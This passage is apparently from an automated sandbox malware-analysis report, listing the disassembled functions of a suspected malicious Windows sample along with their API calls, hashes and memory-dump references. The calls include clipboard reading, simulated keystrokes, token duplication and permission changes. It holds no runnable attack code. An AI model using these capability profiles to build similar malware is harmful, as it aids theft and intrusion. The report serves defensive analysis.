            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateErrorFileLast
            • String ID:
            • API String ID: 1214770103-0
            • Opcode ID: 57736e384e8898b280f0226ead8de1867055c26b77a625883431ea02e3489575
            • Instruction ID: 0f616c4522cab5a9d4a073de827250c1fbf19837ed33f15a62e96fd653e0fcb8
            • Opcode Fuzzy Hash: 57736e384e8898b280f0226ead8de1867055c26b77a625883431ea02e3489575
            • Instruction Fuzzy Hash: EA81B1706043018FDB15EF28C891BADB7E1BF89310F08496DF8C65B296DB78E945CB92
            Function 00FBFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
            • Instruction ID: 7b22f243c01199e261c7c341373e19969c229703b86a1641ba2c03a2ba5318fc
            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
            • Instruction Fuzzy Hash: F7310CB5A00109DBC718DF5AD880AA9FBA1FF49310B6486A5E805CF656D731EEC5EFC0
            Function 00F022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNELBASE(000001F4), ref: 00F022B1
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
            • Instruction ID: 5bc72ce5359d39b833cb47bcebec766d50564d9c9530481b46e2c6cab6baf91a
            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
            • Instruction Fuzzy Hash: 4FE0BF7494010E9FDB00EFA8D54969E7BB4EF04301F100161FD0592280D63099509A72

            Non-executed Functions

            Function 01039576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0103961A
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103965B
            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0103969F
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010396C9
            • SendMessageW.USER32 ref: 010396F2
            • GetKeyState.USER32(00000011), ref: 0103978B
            • GetKeyState.USER32(00000009), ref: 01039798
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 010397AE
            • GetKeyState.USER32(00000010), ref: 010397B8
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010397E9
            • SendMessageW.USER32 ref: 01039810
            • SendMessageW.USER32(?,00001030,?,01037E95), ref: 01039918
            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0103992E
            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01039941
            • SetCapture.USER32(?), ref: 0103994A
            • ClientToScreen.USER32(?,?), ref: 010399AF
            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 010399BC
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010399D6
            • ReleaseCapture.USER32 ref: 010399E1
            • GetCursorPos.USER32(?), ref: 01039A19
            • ScreenToClient.USER32(?,?), ref: 01039A26
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01039A80
            • SendMessageW.USER32 ref: 01039AAE
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01039AEB
            • SendMessageW.USER32 ref: 01039B1A
            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01039B3B
            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 01039B4A
            • GetCursorPos.USER32(?), ref: 01039B68
            • ScreenToClient.USER32(?,?), ref: 01039B75
            • GetParent.USER32(?), ref: 01039B93
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01039BFA
            • SendMessageW.USER32 ref: 01039C2B
            • ClientToScreen.USER32(?,?), ref: 01039C84
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01039CB4
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01039CDE
            • SendMessageW.USER32 ref: 01039D01
            • ClientToScreen.USER32(?,?), ref: 01039D4E
            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 01039D82
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            • GetWindowLongW.USER32(?,000000F0), ref: 01039E05
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
            • String ID: @GUI_DRAGID$F
            • API String ID: 3429851547-4164748364
            • Opcode ID: 744f4869a1abf91afef61298333656910f34a8813c142a137e4fa1a649d87f9e
            • Instruction ID: 66efb92b2eae5133f34c2208dfe01231cad0cf76d83b2240ac4c310cab6a1acd
            • Opcode Fuzzy Hash: 744f4869a1abf91afef61298333656910f34a8813c142a137e4fa1a649d87f9e
            • Instruction Fuzzy Hash: B342BF34605201AFE725CF28C844EAABBE9FF8D318F000659F6D9972A1D7B6E850DF51
            Function 01034873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 010348F3
            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01034908
            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01034927
            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0103494B
            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0103495C
            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0103497B
            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 010349AE
            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 010349D4
            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01034A0F
            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01034A56
            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01034A7E
            • IsMenu.USER32(?), ref: 01034A97
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01034AF2
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01034B20
            • GetWindowLongW.USER32(?,000000F0), ref: 01034B94
            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01034BE3
            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01034C82
            • wsprintfW.USER32 ref: 01034CAE
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01034CC9
            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01034CF1
            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01034D13
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01034D33
            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01034D5A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
            • String ID: %d/%02d/%02d
            • API String ID: 4054740463-328681919
            • Opcode ID: c9da8dccd3fae53467ab499aebc1fcff67df7524410b806f0534bdf43d116847
            • Instruction ID: b15d3c8e105041e7c33aadf38c96e0d2d3b5dccb5e120c989007b0a7b9adced6
            • Opcode Fuzzy Hash: c9da8dccd3fae53467ab499aebc1fcff67df7524410b806f0534bdf43d116847
            • Instruction Fuzzy Hash: 9C12DC71600214ABFB259F28CD49FAE7BECAF89310F04416AF596EA2D1DB789941CB50
            Function 00FBF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00FBF998
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FFF474
            • IsIconic.USER32(00000000), ref: 00FFF47D
            • ShowWindow.USER32(00000000,00000009), ref: 00FFF48A
            • SetForegroundWindow.USER32(00000000), ref: 00FFF494
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFF4AA
            • GetCurrentThreadId.KERNEL32 ref: 00FFF4B1
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFF4BD
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFF4CE
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFF4D6
            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00FFF4DE
            • SetForegroundWindow.USER32(00000000), ref: 00FFF4E1
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF4F6
            • keybd_event.USER32(00000012,00000000), ref: 00FFF501
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF50B
            • keybd_event.USER32(00000012,00000000), ref: 00FFF510
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF519
            • keybd_event.USER32(00000012,00000000), ref: 00FFF51E
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF528
            • keybd_event.USER32(00000012,00000000), ref: 00FFF52D
            • SetForegroundWindow.USER32(00000000), ref: 00FFF530
            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00FFF557
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
            • String ID: Shell_TrayWnd
            • API String ID: 4125248594-2988720461
            • Opcode ID: a6fa4d02d8d6e88a65c337bb8a0790e23caf6151cf4b7a18a85a10e20f85c263
            • Instruction ID: 6576c63d319c6e7810b1f42abee0a8d71a8134259bbd7c5b40f2bb5fb844e60e
            • Opcode Fuzzy Hash: a6fa4d02d8d6e88a65c337bb8a0790e23caf6151cf4b7a18a85a10e20f85c263
            • Instruction Fuzzy Hash: 43313072A40218BAFB316BB55D4AFBF7E6CEF44B50F140066FA41F61D1C6B59900BB60
            Function 01001201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 010016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
              • Part of subcall function 010016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
              • Part of subcall function 010016C3: GetLastError.KERNEL32 ref: 0100174A
            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01001286
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 010012A8
            • CloseHandle.KERNEL32(?), ref: 010012B9
            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010012D1
            • GetProcessWindowStation.USER32 ref: 010012EA
            • SetProcessWindowStation.USER32(00000000), ref: 010012F4
            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01001310
              • Part of subcall function 010010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010011FC), ref: 010010D4
              • Part of subcall function 010010BF: CloseHandle.KERNEL32(?,?,010011FC), ref: 010010E9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
            • String ID: $default$winsta0
            • API String ID: 22674027-1027155976
            • Opcode ID: bab02002adaaa83fc38a5305f71f952e561267a9a21039f74832bac7f9abd74b
            • Instruction ID: bc96a2758d63f58c9b9f8e382f6ea30899c4f88f6ba6d504c33740e18dc4184b
            • Opcode Fuzzy Hash: bab02002adaaa83fc38a5305f71f952e561267a9a21039f74832bac7f9abd74b
            • Instruction Fuzzy Hash: 38816D71900209ABFF229FA8DD49BEE7FB9AF04704F14415AFA90F61A0CB75D954CB60
            Function 01000B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
              • Part of subcall function 010010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
              • Part of subcall function 010010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
              • Part of subcall function 010010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01000BCC
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01000C00
            • GetLengthSid.ADVAPI32(?), ref: 01000C17
            • GetAce.ADVAPI32(?,00000000,?), ref: 01000C51
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01000C6D
            • GetLengthSid.ADVAPI32(?), ref: 01000C84
            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01000C8C
            • HeapAlloc.KERNEL32(00000000), ref: 01000C93
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01000CB4
            • CopySid.ADVAPI32(00000000), ref: 01000CBB
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01000CEA
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01000D0C
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01000D1E
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D45
            • HeapFree.KERNEL32(00000000), ref: 01000D4C
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D55
            • HeapFree.KERNEL32(00000000), ref: 01000D5C
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D65
            • HeapFree.KERNEL32(00000000), ref: 01000D6C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 01000D78
            • HeapFree.KERNEL32(00000000), ref: 01000D7F
              • Part of subcall function 01001193: GetProcessHeap.KERNEL32(00000008,01000BB1,?,00000000,?,01000BB1,?), ref: 010011A1
              • Part of subcall function 01001193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01000BB1,?), ref: 010011A8
              • Part of subcall function 01001193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01000BB1,?), ref: 010011B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
            • String ID:
            • API String ID: 4175595110-0
            • Opcode ID: 60a522a31759c7d82e6ddfd744baf12e9b7284dc18f763a33e50f6421ec8239f
            • Instruction ID: 71c345ca4ee49820295a2406b482970d2bebc81459b24b4666577035bf15b3f6
            • Opcode Fuzzy Hash: 60a522a31759c7d82e6ddfd744baf12e9b7284dc18f763a33e50f6421ec8239f
            • Instruction Fuzzy Hash: 55716A7290020AABFF219FA8DD44FEEBBBCBF05240F044556FA94E6184D775AA05CB60
            Function 0101EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
            Download Yara Rule
            APIs
            • OpenClipboard.USER32(0103CC08), ref: 0101EB29
            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0101EB37
            • GetClipboardData.USER32(0000000D), ref: 0101EB43
            • CloseClipboard.USER32 ref: 0101EB4F
            • GlobalLock.KERNEL32(00000000), ref: 0101EB87
            • CloseClipboard.USER32 ref: 0101EB91
            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0101EBBC
            • IsClipboardFormatAvailable.USER32(00000001), ref: 0101EBC9
            • GetClipboardData.USER32(00000001), ref: 0101EBD1
            • GlobalLock.KERNEL32(00000000), ref: 0101EBE2
            • GlobalUnlock.KERNEL32(00000000,?), ref: 0101EC22
            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0101EC38
            • GetClipboardData.USER32(0000000F), ref: 0101EC44
            • GlobalLock.KERNEL32(00000000), ref: 0101EC55
            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0101EC77
            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0101EC94
            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0101ECD2
            • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0101ECF3
            • CountClipboardFormats.USER32 ref: 0101ED14
            • CloseClipboard.USER32 ref: 0101ED59
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
            • String ID:
            • API String ID: 420908878-0
            • Opcode ID: 02b11d7ae6a57d497f3aecc98f79a9d2aa2dba8c167183fb576a5401545e3e7d
            • Instruction ID: 3f5c953d62cabee013a3962c6c28bd957926e9842219c1df4554b7eb014b4a01
            • Opcode Fuzzy Hash: 02b11d7ae6a57d497f3aecc98f79a9d2aa2dba8c167183fb576a5401545e3e7d
            • Instruction Fuzzy Hash: 8A61E2752042019FE311EF28C988F2E7BE8BF89704F44445EF996D7296CB39E905CB62
            Function 0101698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 010169BE
            • FindClose.KERNEL32(00000000), ref: 01016A12
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01016A4E
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01016A75
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01016AB2
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01016ADF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
            • API String ID: 3830820486-3289030164
            • Opcode ID: 4cb75283938400463d6ba982bffd46e038d99b6238ccb3a563414ea10b2523d0
            • Instruction ID: 924a3905c6b8121821e61c92275961baed6f01dec425cbb3fbba20ca93f25360
            • Opcode Fuzzy Hash: 4cb75283938400463d6ba982bffd46e038d99b6238ccb3a563414ea10b2523d0
            • Instruction Fuzzy Hash: F2D15FB2508300AEC310EBA5CD91EAFB7ECAF89704F44491DF585C7191EB79DA48DB62
            Function 01019642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 01019663
            • GetFileAttributesW.KERNEL32(?), ref: 010196A1
            • SetFileAttributesW.KERNEL32(?,?), ref: 010196BB
            • FindNextFileW.KERNEL32(00000000,?), ref: 010196D3
            • FindClose.KERNEL32(00000000), ref: 010196DE
            • FindFirstFileW.KERNEL32(*.*,?), ref: 010196FA
            • SetCurrentDirectoryW.KERNEL32(?), ref: 0101974A
            • SetCurrentDirectoryW.KERNEL32(01066B7C), ref: 01019768
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 01019772
            • FindClose.KERNEL32(00000000), ref: 0101977F
            • FindClose.KERNEL32(00000000), ref: 0101978F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
            • String ID: *.*
            • API String ID: 1409584000-438819550
            • Opcode ID: 570f0f1bd7966804e7b9efdd685813808e37549eb3bbb415f78af1e607d1441e
            • Instruction ID: d858339a1a238c45dff683b91b547b7f2966c40888a7e40d5530903a51f3887a
            • Opcode Fuzzy Hash: 570f0f1bd7966804e7b9efdd685813808e37549eb3bbb415f78af1e607d1441e
            • Instruction Fuzzy Hash: 8131FB325006196EEF24EFB9DD19EDE7BECAF49224F00459AF985E3094D739D980CB20
            Function 0101979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 010197BE
            • FindNextFileW.KERNEL32(00000000,?), ref: 01019819
            • FindClose.KERNEL32(00000000), ref: 01019824
            • FindFirstFileW.KERNEL32(*.*,?), ref: 01019840
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01019890
            • SetCurrentDirectoryW.KERNEL32(01066B7C), ref: 010198AE
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 010198B8
            • FindClose.KERNEL32(00000000), ref: 010198C5
            • FindClose.KERNEL32(00000000), ref: 010198D5
              • Part of subcall function 0100DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0100DB00
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
            • String ID: *.*
            • API String ID: 2640511053-438819550
            • Opcode ID: 445fbd22c4de93b92921c1dc21cc6351b3cc1930b26f117eeb61a922ca070cf3
            • Instruction ID: 0c68d92e566b69d414a6f56e74025084ab86932abbed94e92345929e6e4c6264
            • Opcode Fuzzy Hash: 445fbd22c4de93b92921c1dc21cc6351b3cc1930b26f117eeb61a922ca070cf3
            • Instruction Fuzzy Hash: 9D31EC31500219AEFF20DFB9DC54ADE7BEC9F45224F10419AED94F2094D739D985CB20
            Function 01018195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
            Download Yara Rule
            APIs
            • GetLocalTime.KERNEL32(?), ref: 01018257
            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01018267
            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01018273
